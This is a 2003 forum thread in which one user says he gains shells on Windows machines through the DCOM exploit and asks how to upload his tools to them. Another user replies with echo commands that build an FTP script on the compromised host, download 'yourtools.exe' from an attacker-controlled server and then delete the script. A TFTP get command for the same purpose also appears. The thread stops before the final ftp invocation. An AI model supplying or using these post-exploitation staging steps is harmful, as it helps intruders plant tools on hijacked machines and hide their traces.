kobilica
Sep 13 2003, 01:12 AM
hey ppl..
when i get a shell at dcom exploit (593) i try to send my files throu the echo way and the tftp way, but sometimes those won't work, now i've seen that there is one other possibility, but can't figure out how to use it right. just type in the shell RCP... this is what u get:
| QUOTE |
Copies files to and from computer running the RCP service.
RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination
-a Specifies ASCII transfer mode. This mode converts the EOL characters to a carriage return for UNIX and a carriage return/line feed for personal computers. This is the default transfer mode. -b Specifies binary image transfer mode. -h Transfers hidden files. -r Copies the contents of all subdirectories; destination must be a directory. host Specifies the local or remote host. If host is specified as an IP address OR if host name contains dots, you must specify the user. .user: Specifies a user name to use, rather than the current user name. source Specifes the files to copy. path\destination Specifies the path relative to the logon directory on the remote host. Use the escape characters (\ , ", or ') in remote paths to use wildcard characters on the remote host. |
i know the tftp way - tftp -i "ip" get file_name but can't figure out for this one

can any1 plz help ? and is there any other way to upload the files ?
tia
Master00
Sep 13 2003, 01:37 AM
why dont u use ftp command? faster than tftp for sure. create an account with the tools inside u want to upload, type this in the server (replace user, pass, tools

)
| CODE |
echo user >> c:\t.txt echo pass >> c:\t.txt echo get yourtools.exe >> c:\t.txt echo get yourtools2.ini >> c:\t.txt echo binary >> c:\t.txt echo del c:\t.txt >> c:\t.txt echo bye
|
When u got that txt done , type in this to make ftp.exe execute the commands inside .txt (replace ip with the one where ur utils are

)